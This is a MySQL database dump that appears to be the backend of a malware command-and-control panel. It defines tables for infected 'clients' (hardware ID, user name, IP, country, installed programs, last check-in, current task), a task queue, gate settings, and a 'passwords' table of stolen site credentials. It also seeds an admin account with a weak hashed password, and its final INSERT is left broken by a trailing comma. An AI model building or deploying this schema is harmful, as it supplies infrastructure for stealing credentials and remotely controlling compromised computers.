SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";
SET time_zone = "+00:00";

/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;


CREATE TABLE `clients` (
  `id` int(11) NOT NULL,
  `hwid` varchar(255) NOT NULL,
  `buildName` varchar(255) NOT NULL,
  `buildType` varchar(255) NOT NULL,
  `buildVersion` varchar(255) NOT NULL,
  `cpuArchitecture` varchar(255) NOT NULL,
  `cpuCores` varchar(255) NOT NULL,
  `computerName` varchar(255) NOT NULL,
  `cpu` varchar(255) NOT NULL,
  `gpu` varchar(255) NOT NULL,
  `installPath` varchar(255) NOT NULL,
  `operatingSystem` varchar(255) NOT NULL,
  `privilege` varchar(255) NOT NULL,
  `ram` varchar(255) NOT NULL,
  `userName` varchar(255) NOT NULL,
  `vram` varchar(255) NOT NULL,
  `ipAddr` varchar(255) NOT NULL,
  `country` varchar(255) NOT NULL,
  `foundPrograms` text NOT NULL,
  `installDate` varchar(255) NOT NULL,
  `lastKnock` varchar(255) NOT NULL,
  `currentTask` varchar(255) NOT NULL,
  `mark` varchar(255) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

CREATE TABLE `c_tasks` (
  `id` int(11) NOT NULL,
  `taskID` varchar(100) NOT NULL,
  `hwid` varchar(100) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

CREATE TABLE `f_tasks` (
  `id` int(11) NOT NULL,
  `taskID` varchar(100) NOT NULL,
  `hwid` varchar(100) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

CREATE TABLE `passwords` (
  `id` int(11) NOT NULL,
  `hwid` varchar(100) NOT NULL,
  `url` text NOT NULL,
  `username` text,
  `password` text,
  `program` text NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

CREATE TABLE `settings` (
  `knock` int(11) NOT NULL,
  `dead` int(11) NOT NULL,
  `gate_status` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

INSERT INTO `settings` (`knock`, `dead`, `gate_status`) VALUES
(5, 7, 1);

CREATE TABLE `tasks` (
  `id` int(11) NOT NULL,
  `taskId` varchar(100) DEFAULT NULL,
  `task` varchar(100) DEFAULT NULL,
  `parameters` varchar(100) DEFAULT NULL,
  `filters` varchar(100) DEFAULT NULL,
  `author` varchar(100) DEFAULT NULL,
  `status` int(11) DEFAULT NULL,
  `date` int(11) DEFAULT NULL,
  `total` int(11) NOT NULL,
  `compleated` int(11) DEFAULT NULL,
  `failed` int(11) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

CREATE TABLE `users` (
  `id` int(11) NOT NULL,
  `username` varchar(20) DEFAULT NULL,
  `password` varchar(100) DEFAULT NULL,
  `status` int(11) NOT NULL,
  `permissions` varchar(20) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

INSERT INTO `users` (`id`, `username`, `password`, `status`, `permissions`) VALUES
(1, 'admin', '8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918', 1, 'admin'),



ALTER TABLE `clients`
  ADD PRIMARY KEY (`id`);

ALTER TABLE `c_tasks`
  ADD PRIMARY KEY (`id`);

ALTER TABLE `f_tasks`
  ADD PRIMARY KEY (`id`);

ALTER TABLE `passwords`
  ADD PRIMARY KEY (`id`);

ALTER TABLE `tasks`
  ADD PRIMARY KEY (`id`);

ALTER TABLE `users`
  ADD PRIMARY KEY (`id`);


ALTER TABLE `clients`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=5;
ALTER TABLE `c_tasks`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;
ALTER TABLE `f_tasks`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;
ALTER TABLE `passwords`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=15;
ALTER TABLE `tasks`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=3;
ALTER TABLE `users`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=28;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
